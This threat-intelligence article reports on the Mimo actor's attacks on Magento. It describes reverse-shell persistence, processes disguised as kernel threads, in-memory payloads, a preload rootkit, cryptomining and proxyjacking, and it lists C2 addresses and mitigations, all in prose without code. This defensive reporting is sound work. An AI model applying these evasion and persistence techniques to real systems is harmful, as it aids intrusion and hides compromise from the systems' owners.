Mimo Targets Magento CMS to Steal Card Details and Monetize Bandwidth

The Datadog Security Research team has uncovered the Mimo threat actor also known as Mimo’lette or Hezb expanding its operations from Craft CMS to Magento CMS.

Previously documented for deploying cryptominers via public-facing vulnerabilities, Mimo now exploits undetermined PHP-FPM flaws in Magento installations to gain initial access, marking a tactical shift toward broader platform targeting.

This evolution includes sophisticated persistence and evasion mechanisms, suggesting preparation for more advanced financial crimes beyond mere resource exploitation.

Evolution of Tactics

Investigations reveal multi-day intrusions where attackers employ command injection through Magento plugins, enabling unauthorized remote access and monetization of compromised systems.

Mimo’s updated toolkit leverages the legitimate GSocket penetration testing tool for firewall and NAT bypass, establishing encrypted connections via the Global Socket Relay Network (GSRN) with end-to-end AES-256-CBC encryption and TOR support.

Persistence is achieved through systemd service units, rc.local modifications, and crontab entries that execute GSocket-based reverse shells hourly, masquerading as kernel threads like [kstrp], [watchdogd], or [kswapd0] to evade detection.

A notable evasion technique involves the memfd_create() syscall, creating anonymous in-memory files named after legitimate kernel processes (e.g., memfd:[rcu_sched]), allowing payloads to run without disk footprints.

Prior to deployment, attackers clear artifacts from .bashrc, .bash_profile, and /etc/ld.so.preload, then inject the alamdar.so rootkit to hook system calls, concealing processes such as XMRig miners and IPRoyal proxy clients.

Infrastructure Insights

Financially motivated, Mimo combines cryptojacking with proxyjacking for “profit stacking.” UPX-packed XMRig variants mine Monero on C3Pool, consuming CPU resources, while the hezb.x86_64 IPRoyal Pawns client monetizes bandwidth as residential proxies, generating passive income with minimal overhead.

This dual approach ensures resilience; even if mining is disrupted, proxy operations persist undetected.

Reverse engineering of Docker-targeted variants reveals modular Go-based malware under the alamdar/313 package, featuring file I/O, command execution, and SSH brute-forcing modules that propagate via known_hosts extraction and subnet scanning with usernames like “ec2-user,” indicating AWS focus.

Multi-tier command-and-control rotates servers (e.g., from 109.205.213.203:21 to 193.32.162.10:21), enhancing operational security.

Additional targeting of misconfigured Docker APIs spawns malicious containers, fetching payloads like cron.jpg via base64-decoded curls, parameterized for service-specific tracking.

This diversification absent from prior reports highlights Mimo’s adaptability, potentially enabling card detail theft in ecommerce environments by persisting in memory and evading forensics.

Mitigation involves auditing /etc/ld.so.preload for unauthorized entries, updating CMS platforms, blocking Monero ports (3333, 5555), and scrutinizing cron jobs for obfuscated commands.

Reviewing process inodes and killing hidden executables from clean boots is essential to eradicate rootkits and rotate credentials.

Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now